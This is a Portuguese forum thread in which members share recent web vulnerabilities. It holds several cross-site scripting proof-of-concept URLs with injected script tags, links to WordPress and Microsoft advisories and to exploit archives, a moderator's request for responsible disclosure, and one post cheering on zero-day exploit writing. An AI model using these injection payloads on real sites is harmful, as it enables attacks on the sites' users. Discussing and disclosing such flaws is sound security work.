• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

kn0ppix

Vulnerabilidades

8 mensagens neste tópico

Decidi criar este tópico com o intuito dos membros desta comunidade apresentarem as mais recentes vulnerabilidades, assim como discuti-las. Não sei se este tópico vai contra as regras do fórum, caso isso aconteça peço ao STAFF que o apaguem/bloqueiem.

Como tal vou começar com a primeira, posteriormente vou postar mais.

Muito simples, aqui vai uma vulnerabilidade de XSS:

http://www.site.pt/index.php?p=122&arg=%3Cscript%3Ealert(/kn0ppix/.source)%3C%2Fscript%3E

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Penso que o tópico não foge às regras senão pusermos em causa as empresas (os sites) mas apenas o que realmente interessa, como é usada a vulnerabilidade.

Como os blogs estão muito na moda últimamente:

WordPress 2.8.3 Remote admin reset password

http://seclists.org/fulldisclosure/2009/Aug/0113.html

E um XSS

http://www.site.com/index.php?txtkeywords=<SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT>&cmdSearch=Search

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Penso que o tópico não foge às regras senão pusermos em causa as empresas (os sites) mas apenas o que realmente interessa, como é usada a vulnerabilidade.

Vou esperar que algum membro do staff se pronuncie, caso seja contra as regras eu retiro sem problemas.

Aí vai outra de XSS:

http://www.site.com.pt/base/guest/phpthumb/demo/phpThumb.demo.showpic.php?src=images%2Fsmall.jp%20%20g&title=This%2Bis%2Ba%2Bsmall%2Bpicture&fltr[]=%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(/XSS%20By%20kn0ppix/)%3B%3C/ScRiPt%3E%3Ch1%3EXSS%20By%20kn0ppix%20/h1%3E%%20%203C/marquee%3E

E a mais recente da M$:

http://support.microsoft.com/kb/972890/pt-br

http://www.milw0rm.com/exploits/9108

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Apenas pedia bom senso nas vulnerabilidades divulgadas, i.e., não se ponham a divulgar coisas que possam facilmente ser usadas para provocar estragos significativos.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Apenas pedia bom senso nas vulnerabilidades divulgadas, i.e., não se ponham a divulgar coisas que possam facilmente ser usadas para provocar estragos significativos.

Vou tentar, mas por exemplo a do Wordpress senti que devia divulgar (mais do que já está) pois todos agora usam, e senão sabem desta falha lá se vai a conta de admin!

Vê o teu caso por exemplo, que tens um blog Wordpress, senão soubesses do problema podias ser uma possivel vitima, além de que já existe uma outra versão do wordpress :)

Quero com isto dizer que sempre que possível actualizem a vossa plataforma, pois se existe um update por algum motivo ele surgiu.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Esta da WordPress não era nada de grave (não, a conta de admin não se ia...) e já se encontra resolvida... De qualquer forma, a WordPress já avisa os seus utilizadores das vulnerabilidades, assim como da disponibilidade de actualizações.

Já, por exemplo, divulgar uma vulnerabilidade específica de um site antes de estar resolvida não me parece boa ideia (para ajudarem, basta comunicarem com os administradores do site).

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Esta da WordPress não era nada de grave (não, a conta de admin não se ia...) e já se encontra resolvida... De qualquer forma, a WordPress já avisa os seus utilizadores das vulnerabilidades, assim como da disponibilidade de actualizações.

Já, por exemplo, divulgar uma vulnerabilidade específica de um site antes de estar resolvida não me parece boa ideia (para ajudarem, basta comunicarem com os administradores do site).

Links editados. :)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

o que era da vulnerabilidade sem o exploit?    :cheesygrin:

Referencias:

Sobre as ultimas vulnerabilidades (podem analisar a vulnerabilidade e criar o vosso proprio exploit... zero day nunca falha  :ipool: :thumbsup:)

http://www.securityfocus.com/vulnerabilities

A melhor framework de exploits (para mim. o criador foi considerada a figura mais importante no mundo da segurança HD Moore)

http://www.metasploit.com/

trunk com os exploits mais fresquinhos (alguns mesmo fresquinhos... podes ver pelo last modified nas categorias)

http://trac.metasploit.com/browser/framework3/trunk/modules/exploits

para exploits independentes de framework, o milw0rm

http://www.milw0rm.com/

exploits do mês no packetstorm

http://packetstormsecurity.org/0908-exploits/

Last 100 security Flaws (PacketStorm)

http://corecommandos.com/packetstorm

teckV

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora